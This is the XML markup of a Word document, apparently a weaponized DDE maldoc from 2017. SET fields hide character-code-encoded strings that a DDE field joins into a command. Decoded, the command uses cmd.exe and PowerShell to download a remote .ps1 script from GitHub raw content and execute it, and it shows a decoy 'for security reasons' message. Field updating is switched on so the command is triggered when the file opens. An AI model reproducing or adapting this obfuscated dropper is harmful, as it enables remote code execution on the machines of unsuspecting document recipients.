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6" w:rsidRDefault="00830AD6" w:rsidP="00830AD6">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:instrText>SET c</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:fldSimple w:instr="  QUOTE  67 58 92 80 114 111 103 114 97 109 115 92 77 105 99 114 111 115 111 102 116 92 79 102 102 105 99 101 92 77 83 119 111 114 100 46 101 120 101 92 46 46 92 46 46 92 46 46 92 46 46 92 119 105 110 100 111 119 115 92 115 121 115 116 101 109 51 50 92 99 109 100 46 101 120 101  ">
        <w:r>
          <w:rPr>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:instrText> </w:instrText>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830AD6" w:rsidRDefault="00830AD6" w:rsidP="00830AD6">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:instrText>SET d</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:fldSimple w:instr="  QUOTE  47 99 32 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 36 101 32 61 32 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 83 116 114 105 110 103 40 34 34 34 104 116 116 112 115 58 47 47 114 97 119 46 103 105 116 104 117 98 117 115 101 114 99 111 110 116 101 110 116 46 99 111 109 47 98 111 110 117 120 84 49 47 120 47 109 97 115 116 101 114 47 120 46 112 115 49 34 34 34 41 59 32 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 45 101 110 99 32 36 101 59  ">
        <w:r>
          <w:rPr>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:instrText> </w:instrText>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830AD6" w:rsidRDefault="00830AD6" w:rsidP="00830AD6">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:instrText>SET e</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:fldSimple w:instr="  QUOTE  102 111 114 32 115 101 99 117 114 105 116 121 32 114 101 97 115 111 110 115  ">
        <w:r>
          <w:rPr>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:instrText> </w:instrText>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00522B43" w:rsidRDefault="00BF6731">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DDE</w:instrText>
      </w:r>
      <w:r w:rsidR="00830AD6">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:fldSimple w:instr=" REF c ">
        <w:r w:rsidR="00830AD6">
          <w:rPr>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:instrText> </w:instrText>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00830AD6">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:fldSimple w:instr=" REF d ">
        <w:r w:rsidR="00830AD6">
          <w:rPr>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:instrText> </w:instrText>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00830AD6">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:fldSimple w:instr=" REF e ">
        <w:r w:rsidR="00830AD6">
          <w:rPr>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:instrText> </w:instrText>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00522B43">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
      <w:cols w:space="720"/>
      <w:docGrid w:linePitch="360"/>
    </w:sectPr>
  </w:body>
  <w:body>
    <w:p w:rsidR="00044AB2" w:rsidRDefault="00044AB2">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="0004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updateFields w:val="true"/>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1"/>
    <w:rsid w:val="00044AB2"/>
    <w:rsid w:val="0024590E"/>
    <w:rsid w:val="00583ADA"/>
    <w:rsid w:val="00830AD6"/>
    <w:rsid w:val="0098511A"/>
    <w:rsid w:val="009D08A1"/>
    <w:rsid w:val="00B23FD8"/>
    <w:rsid w:val="00BE3EDE"/>
    <w:rsid w:val="00BF6731"/>
    <w:rsid w:val="00D9666E"/>
    <w:rsid w:val="00F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2017-10-27T22:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-27T22:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>